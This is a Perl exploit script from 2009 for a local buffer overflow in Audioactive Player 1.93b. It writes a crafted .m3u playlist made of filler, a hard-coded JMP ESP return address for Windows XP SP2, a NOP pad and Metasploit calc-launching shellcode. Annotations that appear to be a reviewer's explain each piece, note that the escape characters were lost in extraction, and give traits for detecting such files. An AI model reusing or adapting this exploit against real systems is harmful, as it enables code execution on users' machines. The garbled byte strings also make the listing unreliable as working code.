# Title : Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit
# Published : 2009-05-15
# Author : hack4love
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
# Greetz to all my friends
# From EGYPT
##################################################################
# Builds the playlist content from four concatenated pieces (filler, return
# address, NOP pad, payload) and appends it to hack4love.m3u.
# NOTE(review): as rendered on this page the string literals contain no
# backslash escapes, so every "xNN" below is three ASCII characters, not one
# raw byte -- presumably lost in page extraction. Do not derive byte counts,
# offsets or detection signatures from this listing without confirming
# against an authoritative copy.

# Filler: the literal "x41" repeated 224 times, placed ahead of the
# return-address slot.
my $bof="x41" x 224;
# Return-address slot. The value is hard-coded and labelled by the author as a
# JMP ESP inside ntdll.dll; the only platform the author lists as tested is
# Windows XP Pro SP2 (EN), so it is presumably specific to that build. A fixed
# system-DLL address of this kind is exactly what ASLR invalidates.
my $ret="xedx1ex94x7c"; # JMP ESP ntdll.dll
# Pad: the literal "x90" repeated 24 times, sitting between the return-address
# slot and the payload.
my $nop="x90" x 24;
##################################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Per the generator banner above: a Metasploit win32_exec payload whose command
# is calc (a proof-of-concept marker), encoded with PexFnstenvSub. The ten rows
# below hold 16 entries each, which matches the stated Size=160.
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x26".
"xacxdfx53x83xebxfcxe2xf4xdax44x9bx53x26xacx54x16".
"x1ax27xa3x56x5exadx30xd8x69xb4x54x0cx06xadx34x1a".
"xadx98x54x52xc8x9dx1fxcax8ax28x1fx27x21x6dx15x5e".
"x27x6ex34xa7x1dxf8xfbx57x53x49x54x0cx02xadx34x35".
"xadxa0x94xd8x79xb0xdexb8xadxb0x54x52xcdx25x83x77".
"x22x6fxeex93x42x27x9fx63xa3x6cxa7x5fxadxecxd3xd8".
"x56xb0x72xd8x4exa4x34x5axadx2cx6fx53x26xacx54x3b".
"x1axf3xeexa5x46xfax56xabxa5x6cxa4x03x4ex5cx55x57".
"x79xc4x47xadxacxa2x88xacxc1xcfxbex3fx45xacxdfx53";
##################################################################
# Two-argument open on a bareword handle, in append mode ('>>'): running the
# script again adds another copy to an existing file instead of replacing it.
# The return value is not checked, so a failed open goes unreported and the
# print below then writes nothing.
open(myfile,'>>hack4love.m3u');
# Emits the pieces in the order filler, return address, pad, payload, as one
# run with no trailing newline. The handle is never closed explicitly.
# For triage: the result is a playlist file holding a single entry that is not
# a media path and is much longer than one -- entry length and non-path content
# are the observable traits of a file built this way.
print myfile $bof.$ret.$nop.$shellcode;
# Tested on: Windows XP Pro SP2 (EN)
##################################################################